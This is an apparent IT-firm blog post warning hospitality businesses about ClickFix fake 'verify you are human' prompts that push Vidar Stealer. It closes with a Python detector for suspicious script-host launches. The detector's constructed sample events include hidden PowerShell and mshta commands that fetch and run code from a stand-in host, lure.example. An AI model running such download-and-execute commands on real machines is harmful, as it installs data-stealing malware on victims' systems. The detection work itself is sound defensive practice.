Fake ‘verify you’re human’ pop-ups are hijacking hospitality sites
The Australian Signals Directorate’s Cyber Security Centre is warning about a fast-spreading attack called ClickFix, which uses hacked Australian business websites to push data-stealing malware. As the ACSC explains, attackers break into legitimate sites — often WordPress — and inject code that shows visitors a fake “verify you are human” box. Click it, and you’re told to paste a command into Windows. Do that, and you’ve just installed Vidar Stealer, which scrapes saved passwords, browser data and payment details.
For hospitality, this lands on two fronts. First, your own website. Cafes, restaurants, pubs and hotels lean heavily on WordPress for menus, bookings and gift cards, and an unpatched plugin is exactly how these crews get in. If your site is the one serving the fake prompt, it’s your customers being attacked and your name attached to it. Second, your team. Staff hopping between supplier portals, booking platforms and socials on the same machine that runs your POS are prime targets — and a stealer on a back-office PC can reach card and customer data fast.
What to do: tell your team the rule in plain terms — no website should ever ask you to open PowerShell or paste a command to “prove you’re human.” That’s always an attack. Keep WordPress core, themes and plugins patched, delete the ones you don’t use, and put multi-factor authentication on the admin login. On the device side, restricting who can run scripts shuts ClickFix down before it starts.
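One way to check whether your endpoint logging would catch this, as an added example and not ACSC material or this firm's own tooling: the ClickFix chain ends with the victim pasting a command into the Windows Run dialog or a PowerShell window, so the script host it launches has explorer.exe as its parent process. The Python below applies that parent check plus a few command-line heuristics to constructed Sysmon-style process-creation events; the machine names, users and the lure.example URL are made up.

```python
"""Flag process-creation events that fit the ClickFix pattern: a script host
started from the desktop shell (a human pasted the command) whose command line
hides its window, decodes itself, or pulls code from the internet."""
import re

# Script hosts a fake "verify you are human" lure typically has the user launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe",
                "cmd.exe", "wscript.exe", "cscript.exe"}
# explorer.exe as parent means Run dialog / desktop, not a scheduled task or installer.
INTERACTIVE_PARENTS = {"explorer.exe"}
SUSPICIOUS_ARGS = [
    (r"(?i)-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"(?i)-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)\biex\b|invoke-expression", "invoke-expression"),
    (r"(?i)\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", "download cradle"),
    (r"(?i)https?://", "remote URL"),
]

# Constructed sample events (Sysmon Event ID 1 shape); not captured data.
SAMPLE_EVENTS = [
    {"User": "POS-01\\front", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c \"iex (iwr 'http://lure.example/verify')\""},
    {"User": "OFFICE-02\\manager", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -NoProfile -File C:\\scripts\\report.ps1"},   # benign admin use
    {"User": "POS-01\\front", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta https://lure.example/x.hta"},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -enc AAAA"},                                   # not user-launched
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event):
    """Return the list of matched heuristics, or [] if the event is not ClickFix-like."""
    if basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    if basename(event.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
        return []
    cmd = event.get("CommandLine", "")
    return [label for pattern, label in SUSPICIOUS_ARGS if re.search(pattern, cmd)]


def scan(events):
    """Return (user, command line, reasons) for every event that trips at least one heuristic."""
    hits = []
    for event in events:
        reasons = assess(event)
        if reasons:
            hits.append((event["User"], event["CommandLine"], reasons))
    return hits
```

Events 1 and 3 are flagged; the admin script launched from the desktop and the encoded command under svchost.exe are not, which is the point of combining the parent check with the command-line heuristics rather than alerting on every PowerShell start.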
If you’re not sure whether your site or POS network would catch this, it’s worth a look. Our hospitality IT security team can review your setup and close the gaps.